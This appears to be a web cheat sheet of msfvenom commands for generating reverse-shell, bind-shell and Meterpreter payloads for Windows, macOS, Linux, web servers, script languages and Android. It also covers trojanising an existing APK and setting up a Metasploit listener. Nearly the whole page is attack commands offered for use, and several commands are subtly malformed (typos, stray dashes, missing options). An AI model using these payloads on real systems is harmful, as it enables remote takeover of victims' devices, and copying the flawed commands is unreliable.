MSFvenom Payload Creator (MSFPC) is a user-friendly multiple payload generator that can be used to generate Metasploit payloads based on user-selected options.
Content Replace To
ip-address => Attacker ip address
port => Attacker port
Metasploit Payload Listener
- msfdb run
- use exploit/multi/handler
- set payload-name
- set ip-address
- set port
- Run
- Overthewire Bandit walkthrough
- Termux Commands list 2021
- MsfVenom Payload Cheat Sheet
- System Hacking Kali Linux
- windows 10 uac bypass
Windows Payloads
Windows Meterpreter Reverse Shell
1 |
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe |
Windows Reverse Shell
1 |
msfvenom -p windows/shell/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe |
Windows Encoded Meterpreter Reverse Shell
1 |
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 2 -f exe > payload-name.exe |
Windows Meterpreter Reverse Shellcode
1 |
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform |
macOS Payloads
macOS Bind Shell
1 |
msfvenom -p osx/x86/shell_bind_tcp rhost=ip-address lport=port-f macho > payload-name.macho |
macOS Reverse Shell
1 |
msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f macho > payload-name.macho |
macOS Reverse TCP Shellcode
1 |
msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f < platform |
Linux Payloads
Linux Meterpreter TCP Reverse Shell
1 |
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f elf > payload-name.elf |
Linux Bind TCP Shell
1 |
msfvenom -p generic/shell_bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf |
Linux Bind Meterpreter TCP Shell
1 |
msfvenom -p linux/x86/meterpreter/bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf |
Linux Meterpreter Reverse Shellcode
1 |
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform |
Web-base Payloads
PHP Meterpreter Reverse Shell
1 |
msfvenom -p php/meterpreter_reverse_tcp lhost=ip-address LPORT=port -f raw > payload-name.php |
JSP Java Meterpreter Reverse Shell
1 |
msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f raw > payload-name.jsp |
ASP Meterpreter Reverse Shell
1 |
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f asp > payload-nmae.asp |
WAR Reverse TCP Shell
1 |
msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f war > payload-name.war |
Script-Base Payloads
Perl Unix Reverse shell
1 |
msfvenom -p cmd/unix/reverse_perl lhost=ip-address lport=port -f raw > payload-name.pl |
Bash Unix Reverse Shell
1 |
msfvenom -p cmd/unix/reverse_bash lhost=ip-address lport=port -f raw > payload-name.sh |
Python Reverse Shell
1 |
msfvenom -p cmd/unix/reverse_python lhost=ip-address lport=port -f raw > payload-name.py |
Android Payloads
Android Meterpreter reverse Payload
1 |
msfvenom –p android/meterpreter/reverse_tcp lhost=ip-address lport=port R > payload-name.apk |
Android Embed Meterpreter Payload
1 |
msfvenom -x <app.apk> android/meterpreter/reverse_tcp lhost=ip-address lport=port -o payload-name.apk |
MsfVenom Payload Formate
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
Name ---- asp aspx aspx-exe axis2 dll elf elf-so exe exe-only exe-service exe-small hta-psh jar jsp loop-vbs macho msi msi-nouac osx-app psh psh-cmd psh-net psh-reflection vba vba-exe vba-psh vbs war Framework Transform Formats [--format <value>] ============================================== Name ---- bash c csharp dw dword hex java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript |